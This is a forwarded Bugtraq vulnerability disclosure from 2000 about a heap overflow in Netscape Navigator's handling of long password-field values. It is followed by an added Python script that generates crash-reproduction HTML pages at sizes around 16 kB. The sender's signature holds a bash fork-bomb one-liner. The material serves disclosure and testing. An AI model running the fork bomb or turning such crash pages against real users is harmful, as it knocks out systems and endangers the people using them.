----- Forwarded message from Michal Zalewski -----
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Hate: Where do you want to go to die?
Date: Thu, 28 Sep 2000 18:45:41 +0200
Reply-To: Michal Zalewski
From: Michal Zalewski
Subject: Netscape Navigator buffer overflow
To: BUGTRAQ@SECURITYFOCUS.COM

Haven't seen a bug report on it, so I decided to publish this vulnerability. In fact it's pretty old, but still unpublished: Netscape Navigator is vulnerable to a trivial, remote buffer overflow attack when viewing prepared HTML:
...other form tags...
If the buffer is reasonably long, Netscape crashes with SEGV while trying to parse this tag (it happens at around 16 kB of junk as value=) while calling the function XFE_GetFormElementInfo(). It is not a stack overflow, but, as some pointers are overwritten, it seems to be exploitable. If someone has free time and good will, they could try; recall the JPEG comment heap overflow. Only type=password is vulnerable to this attack.

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

----- End forwarded message -----
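The report gives only the ingredients of the test page (an input of type=password with roughly 16 kB of junk in value=) and omits the exact markup. The script below is an added example, not part of the original post, that generates a set of such pages so the claim can be checked by loading them in the affected browser: one series with type=password, and a matching series with type=text as a control for the statement that only type=password triggers the crash. The form layout, attribute names and the ladder of payload sizes bracketing 16 kB are assumptions; nothing here is an exploit, the pages only reproduce the crash condition the report describes.

```python
"""Generate reproduction pages for the Netscape Navigator form-parsing crash
described in the Bugtraq post: an <input type=password> whose value= holds a
long run of junk. Tag layout and sizes are assumed; the post omits the markup."""

import os
import re

# The post puts the crash "around 16 kB of junk as value="; these sizes bracket
# that figure so the threshold can be located by loading the pages in turn.
CANDIDATE_LENGTHS = (8 * 1024, 12 * 1024, 16 * 1024, 20 * 1024, 32 * 1024)


def make_form_page(input_type, length, filler="A"):
    """Return an HTML page with one form whose <input> carries a value= of
    exactly `length` bytes of `filler`. The surrounding markup is assumed."""
    if any(ch in filler for ch in '"<>'):
        raise ValueError("filler must not break out of the value attribute")
    payload = (filler * (length // len(filler) + 1))[:length]
    return (
        "<html><head><title>netscape form test</title></head><body>\n"
        '<form method="post" action="/">\n'
        f'<input type={input_type} name="f" value="{payload}">\n'
        '<input type="submit" value="go">\n'
        "</form>\n</body></html>\n"
    )


def payload_length(page):
    """Read back the length of the first value= attribute in a generated page,
    so a test case can be checked before it is handed to the browser."""
    m = re.search(r'value="([^"]*)"', page)
    return len(m.group(1)) if m else 0


def render_testcases(lengths=CANDIDATE_LENGTHS, input_types=("password", "text")):
    """Build a {filename: html} map covering every length for both input types.
    The type=text pages are controls: per the post they should not crash."""
    pages = {}
    for input_type in input_types:
        for length in lengths:
            pages[f"form-{input_type}-{length}.html"] = make_form_page(input_type, length)
    return pages


def write_testcases(directory, **kwargs):
    """Write the generated pages to `directory` and return the paths written."""
    os.makedirs(directory, exist_ok=True)
    written = []
    for name, page in render_testcases(**kwargs).items():
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write(page)
        written.append(path)
    return written


if __name__ == "__main__":
    for path in write_testcases("netscape-form-tests"):
        print(path)
```

Load the password pages in increasing size order and note the smallest one that crashes; the text page of the same size loading cleanly is the differential check for the "only type=password" claim. Filenames encode the input type and payload size so a crash report can be tied back to the exact page.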